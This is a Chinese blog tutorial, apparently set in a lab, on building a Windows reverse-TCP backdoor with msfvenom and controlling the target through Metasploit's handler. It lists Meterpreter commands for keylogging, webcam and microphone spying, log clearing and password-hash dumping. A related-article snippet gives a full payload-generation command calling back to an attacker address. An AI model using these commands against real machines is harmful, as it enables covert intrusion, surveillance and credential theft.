利用msfvenom生产windows后门

最新推荐文章于 2024-05-29 00:07:14 发布
最新推荐文章于 2024-05-29 00:07:14 发布
阅读量2k 收藏 8
点赞数 2
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/102915886
版权

原理:

利用msfvenom制作shy .exe 文件,然后发送到靶机上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机

1,根据靶机操作系统,搜索适合的生产后门文件的脚本

msfvenom -l payloads | grep windows | grep x64 | grep tcp

2,选择生产脚本,生产后门文件

-p 选择一个payload

-f 生成的文件格式

lhost 攻击机的IP

lhost 攻击机的任意一个端口

3,将生成的后门文件上传到靶机当中

4,启动msfconsole

5,加载exploit/multi/handler模块,设置payload

6,查看payload所需要的参数,可以看出需要设置接收的IP地址和端口

7,设置IP和端口

8,直接exploit,开启攻击,等待运行后门文件

9,在靶机上运行该后门文件

10,发现kali上获得反弹shell

11,常用命令

getwd当前目录

getuid当前用户

dir查看所有文件

cat111.txt 查看文件111.txt内容

search-f cmd.exe (搜索名为123.exe文件所在目录)

upload/root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件

downloadc:\123txt /root 下载文件

clearev清除日志

sysinfo系统信息

keyscan_start开始键盘记录

keyscan_stop停止键盘记录

keyscan_dump查看结果

屏幕截图 screenshot

屏幕监控 run vnc

uictl disable keyboard/mouse 禁用键盘/鼠标 
uictl enable keyboard/mouse 启用键盘/鼠标制权
record_mic 音频录制
record_mic -d 10 后台录音10秒
webcam_chat 查看摄像头接口
webcam_list 查看摄像头列表
webcam_stream 摄像头视频获取
GetSystem 获取高权限
Hashdump 下载hash

shy014
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Kali实现msfvenomWindows和Linux靶机下后门漏洞
weixin_43287317的博客
03-28 6045
Kali实现msfvenomWindows和Linux靶机下后门漏洞
Msf之内网渗透生成Windows后门
weixin_63286108的博客
04-30 3349
Msf内网渗透生成Windows后门
msfconsole攻击win10及简陋版
最新发布
极客云曦前端
05-29 276
该错误提示表明在Metasploit中执行“shell”命令需要加载“stdapi”扩展。这可能是由于Metasploit架缺少所需的依赖库或文件。接下来把木马复制到 /var/www/html下 开启 service apache2 start 即可下载,需要做免杀不然是保存不下来的。在win10 浏览器 输入192.168.1.19/muma.exe。输入 load stdapi 即可解决 需要在肉机 执行 生成的木马。kali 攻击机IP 192.168.1.19。再打开msfconsole。
kali下生成web端后门
weixin_34397291的博客
12-07 801
  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。 Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo  -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件...
MSF生成后门汇总
干铮的博客
10-10 4734
可执行脚本反弹shell 1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名 案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe 监听设置: msfconsole use exploit/mul...
kali Linux生成Windows后门
webkm的博客
04-24 847
教程开始: Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。 首先,查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块 msfvenom -l payloads 然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下: 生成了木马shell.exe,顺便一提lhost(localhost)和lport要设置为你的IP和你打算使用的端口。 ...
Windows服务与后门技术.zip
03-28
Windows服务与后门技术.zip
windows后门程序windows后门程序
02-02
windows后门程序windows后门程序wiwindows后门程序ndows后门程序
Windows常见的持久化后门汇总1
08-03
Windows常见的持久化后门汇总】 在网络安全领域,持久化后门是入侵者用来保持对目标系统长期控制的重要手段。一旦攻击者成功突破系统防御,他们会寻找方法在系统中植入后门,确保即使重启或系统恢复后仍能重新...
windows 登陆 后门(C#源码VS2010)
09-19
windows 登陆 后门(C#源码VS2010) 如何使用: 直接将制作的exe文件改名为:sethc.exe,替换到C:\WINDOWS\system32\,即是粘滞键。 因为避免其他人随便使用后台,需要认证 登陆时的认证:随机抽出1000-5000的素数和...
PHPstudy后门利用脚本
01-22
phpstudy PHPstudy后门利用脚本
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行文件。 前提条件: 1.Linux环境。 2.安装了METASPLOIT框架。 如果您在Kali Linux上运行它会更好。 安装说明 : 下载程序并提供可执行的permision,然后使用./PayloadCreator.pl运行,或者在没有givin permision的情况下运行perl PayloadCreator.pl *忽略info.pl
利用wsc制作的一个asp后门
09-06
在本文中,我们将深入探讨如何利用WSC(Windows Script Component)创建一个ASP后门,以及与之相关的安全风险和防范措施。 首先,让我们理解WSC是什么。WSC是基于COM(Component Object Model)的组件,它允许...
Windows XP后门登录工具
06-04
综上所述,"Windows XP后门登录工具"是一个危险的工具,它展示了如何通过批处理脚本创建后门并绕过系统安全机制。它的存在提醒我们,必须时刻保持系统的安全更新,避免使用未知来源的工具,以防止成为恶意攻击的目标...
phpstudy后门rce批量利用脚本的实现
10-15
本文主要探讨了如何实现针对PHPStudy后门的远程命令执行(RCE)批量利用脚本。PHPStudy是一款集成多种版本的PHP环境管理工具,但有时可能存在安全漏洞,允许攻击者通过特定的HTTP请求执行任意系统命令,这就是所谓的...
Rootkit 后门利用
07-05
Rootkit 后门利用-百度网盘 1.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行系统服务及版本扫描 渗透测试,并将该操作显示结果中 SSH 服务版本信息字符串作为 FLAG 提交;
kali如何制作php字典_kali下生成web端后门
weixin_39890708的博客
12-22 215
很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件名把w...
网络安全: Kali Linux 进行 MSFvenom 程序利用
cronaldo91的博客
03-06 1346
(6) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(1)Ubuntu创建计划任务crontab程序。(7)Kali Linux 连接后门。(2)Kali Linux 连接后门。(13)Ubuntu再次后台运行。(4)Ubuntu查看权限。(6)Ubuntu后台执行。(15)查看用户权限及进程。(1)查看DES 对称加密。(9)设置响应的IP地址。(4)设置响应的IP地址。(10)设置响应的端口。(5)设置响应的端口。
kali的学习笔记篇(五)metasploit之PC后门参数集
Kind&红衣的博客
08-12 738
参数列表: show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出指定渗透攻击或模块的相关信息。 u...
msfvenom生成安卓后门
09-10
生成后,我们可以将后门APK文件传输到目标安卓设备上,然后通过欺骗用户或利用其他手段将后门应用程序执行。一旦应用程序被执行,它会与我们在msfvenom中设置的本地主机IP地址和端口进行通信。 我们还可以进一步...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值